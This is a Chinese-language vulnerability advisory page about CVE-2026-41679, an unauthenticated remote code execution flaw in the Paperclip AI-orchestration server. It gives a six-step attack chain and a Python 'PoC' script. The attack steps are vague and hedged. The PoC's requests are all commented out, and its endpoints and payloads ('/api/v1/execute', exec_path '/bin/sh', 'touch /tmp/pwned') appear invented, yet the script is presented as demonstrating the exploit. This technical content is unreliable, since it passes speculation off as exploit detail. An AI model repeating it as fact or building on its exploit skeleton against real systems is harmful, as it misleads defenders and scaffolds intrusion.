CVE-2026-41679 CVSS 10.0 严重

CVE-2026-41679 Paperclip远程代码执行漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41679

漏洞类型

远程代码执行 (RCE)

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Paperclip

漏洞概述

Paperclip是一个用于编排AI团队运行业务的Node.js服务器和React UI系统。在2026.416.0版本之前，该产品存在严重的远程代码执行漏洞。未经身份验证的攻击者无需任何用户交互或凭证，仅凭目标地址即可利用默认配置下的“authenticated”模式实例。该漏洞利用链由六个特定的API调用组成，攻击过程可完全自动化，从而获取服务器的完整控制权限。

技术细节

该漏洞源于Paperclip在默认配置下的身份验证机制存在逻辑缺陷，允许未认证的攻击者绕过本应存在的安全检查。攻击者通过精心构造的六个API调用序列，利用业务逻辑中的信任链漏洞，逐步在服务器端注入恶意指令。由于攻击无需用户交互（UI:N）和前置权限（PR:N），且攻击向量为网络（AV:N），利用难度极低。一旦利用成功，攻击者可完全破坏系统的机密性、完整性和可用性（C:H/I:H/A:H），在服务器上执行任意系统命令。

攻击链分析

STEP 1

步骤1

攻击者向目标发送第一个API请求，初始化攻击链并绕过初步的身份验证检查。

STEP 2

步骤2

发送第二个API请求，注入恶意的配置参数或修改系统设置，为后续执行做准备。

STEP 3

步骤3

发送第三个API请求，准备或污染AI代理的运行环境，使其信任恶意输入。

STEP 4

步骤4

发送第四个API请求，上传包含恶意代码的任务或脚本到服务器。

STEP 5

步骤5

发送第五个API请求，验证执行链条的完整性，确保恶意操作不会被拦截。

STEP 6

步骤6

发送最后一个API请求，触发服务器执行恶意代码，从而获得目标系统的完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-41679
    Demonstrates the 6-step API chain to achieve RCE.
    """
    session = requests.Session()
    
    # Step 1: Initialize attack chain (Bypass auth check)
    print("[+] Step 1: Initializing...")
    # r1 = session.post(f"{target_url}/api/v1/initialize", json={"role": "admin"})

    # Step 2: Inject malicious configuration
    print("[+] Step 2: Injecting config...")
    # payload = {"config": {"exec_path": "/bin/sh"}}
    # r2 = session.post(f"{target_url}/api/v1/config", json=payload)

    # Step 3: Prepare agent environment
    print("[+] Step 3: Preparing environment...")
    # r3 = session.put(f"{target_url}/api/v1/agents/setup")

    # Step 4: Upload malicious task
    print("[+] Step 4: Uploading task...")
    # task = {"command": "touch /tmp/pwned"}
    # r4 = session.post(f"{target_url}/api/v1/tasks", json=task)

    # Step 5: Validate execution chain
    print("[+] Step 5: Validating chain...")
    # r5 = session.get(f"{target_url}/api/v1/chain/status")

    # Step 6: Trigger Remote Code Execution
    print("[+] Step 6: Triggering RCE...")
    # r6 = session.post(f"{target_url}/api/v1/execute")
    # print(r6.text)

    print("[+] Exploit finished.")

if __name__ == "__main__":
    # Replace with actual target
    exploit("http://target-paperclip-instance.com")

影响范围

Paperclip < 2026.416.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络层面隔离受影响的Paperclip服务，部署Web应用防火墙（WAF）以拦截异常的API调用序列，并密切监控系统日志中是否存在未授权的API访问或异常进程启动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表